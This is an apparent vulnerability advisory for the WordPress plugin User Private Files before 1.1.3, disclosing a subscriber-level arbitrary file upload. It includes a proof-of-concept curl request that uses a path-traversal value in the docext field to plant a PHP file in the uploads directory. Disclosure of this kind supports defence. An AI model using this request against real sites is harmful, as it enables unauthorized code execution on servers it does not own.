Lucene search

K
wpexploitRaad Haddad of Cloudyrion GmbHWPEX-ID:67F3948E-27D4-47A8-8572-616143B9CF43
HistoryJul 12, 2022 - 12:00 a.m.

User Private Files < 1.1.3 - Subscriber+ Arbitrary File Upload

2022-07-1200:00:00
Raad Haddad of Cloudyrion GmbH
173

0.001 Low

EPSS

Percentile

43.0%

The plugin does not filter file extensions when letting users upload files on the server, which may lead to malicious code being uploaded.

1) Create a file named exploit.php, which contains: <?php phpinfo();

2) Find the upf_ajax_nonce on the site's front page.

2) Run the following cURL request, 

curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -b 'YOUR COOKIES' -F '[email protected]' -F 'docext=/../../exploit.php' -F 'doc_type=doc/pdf' -F 'action=upload_doc_callback' -F 'upf_nonce=YOUR NONCE'

# You can find the uploaded PHP file at: https://target/blog/wp-content/uploads/exploit.php

0.001 Low

EPSS

Percentile

43.0%

Related for WPEX-ID:67F3948E-27D4-47A8-8572-616143B9CF43